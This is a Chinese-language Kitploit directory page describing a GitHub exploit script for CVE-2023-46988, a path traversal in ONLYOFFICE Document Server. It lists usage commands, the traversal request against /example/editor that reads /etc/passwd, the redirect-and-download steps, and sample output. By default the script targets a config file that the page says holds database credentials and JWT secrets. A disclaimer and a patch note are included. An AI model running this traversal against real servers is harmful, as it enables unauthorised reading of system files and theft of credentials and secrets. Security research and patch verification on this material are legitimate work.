Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
OnlyOffice-path-traversal — CVE-2023-46988:ONLYOFFICE路径遍历漏洞利用 | Kitploit
工具/GitHubGitHub/mihat2/onlyoffice-path-traversal
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubmihat2/onlyoffice-path-traversal

OnlyOffice-path-traversal

CVE-2023-46988:ONLYOFFICE路径遍历漏洞利用

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ONLYOFFICE 路径遍历漏洞利用 (CVE-2023-46988)

📌 概述

该脚本利用了 ONLYOFFICE Document Server 中的一个路径遍历漏洞(CVE-2023-46988),该漏洞允许未经授权的用户从服务器复制任意文件。该漏洞存在于 /example/editor 端点,其中 fileExt 参数可以被操纵以访问敏感的系统文件和配置文件。

⚠️ 免责声明

此工具仅用于教育和授权的安全研究目的。
未经明确许可对系统进行未授权使用是非法且不道德的。

🛠 功能

  • 获取默认敏感文件:
    • /etc/passwd
    • /etc/onlyoffice/documentserver/local.json(包含数据库凭据和 JWT 机密)
  • 使用 --file 参数指定任意文件路径进行获取。
  • 支持可选代理用于 Burp Suite 拦截(--proxy)。
  • 支持可选的 SSL 验证(--verify)。
  • 修复了下载含有特殊字符文件时的编码问题。

🚀 用法

1️⃣ 基本用法(获取默认文件)

root@kitploit:~
python onlyoffice_exploit.py http://localhost

这将获取:

  • /etc/passwd
  • /etc/onlyoffice/documentserver/local.json

2️⃣ 获取自定义文件(例如 /etc/hosts)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --file /etc/hosts

3️⃣ 启用代理(例如在 127.0.0.1:8080 上的 Burp Suite)

root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy
root@kitploit:~
python onlyoffice_exploit.py http://localhost --proxy http://127.0.0.1:8080

4️⃣ 启用 SSL 验证

root@kitploit:~
python onlyoffice_exploit.py https://example.local --verify

5️⃣ 组合代理和 SSL 验证

root@kitploit:~
python onlyoffice_exploit.py https://example.local --file /etc/hosts --proxy --verify

🔍 工作原理

  1. 发送一个请求到 /example/editor,带有恶意的 fileExt 参数:
    root@kitploit:~
    GET /example/editor?fileExt=../../../../../../../../etc/passwd
    
  2. 从响应中提取重定向 URL。
  3. 从响应中解析重定向的文件名。
  4. 修复文件名中特殊字符的编码问题。
  5. 从 /example/download?fileName=<提取的文件名> 下载文件。

🛠 示例输出

root@kitploit:~
[*] Target URL: http://localhost
[*] Attempting to retrieve: /etc/passwd
[*] Sending request to: http://localhost/example/editor?fileExt=../../../../../../../../etc/passwd
[+] Extracted Redirect URL: http://localhost/example/download?fileName=.passwd
[+] Extracted File Name: .passwd
[*] Downloading file: http://localhost/example/download?fileName=.passwd
[+] File downloaded successfully: .passwd

🔒 缓解措施

ONLYOFFICE 在其 2024 年 2 月更新中修复了此漏洞。
用户应更新到最新版本以保护其服务器。

🐜 许可证

本项目采用 MIT 许可证 – 详情请参阅 LICENSE 文件。

下载工具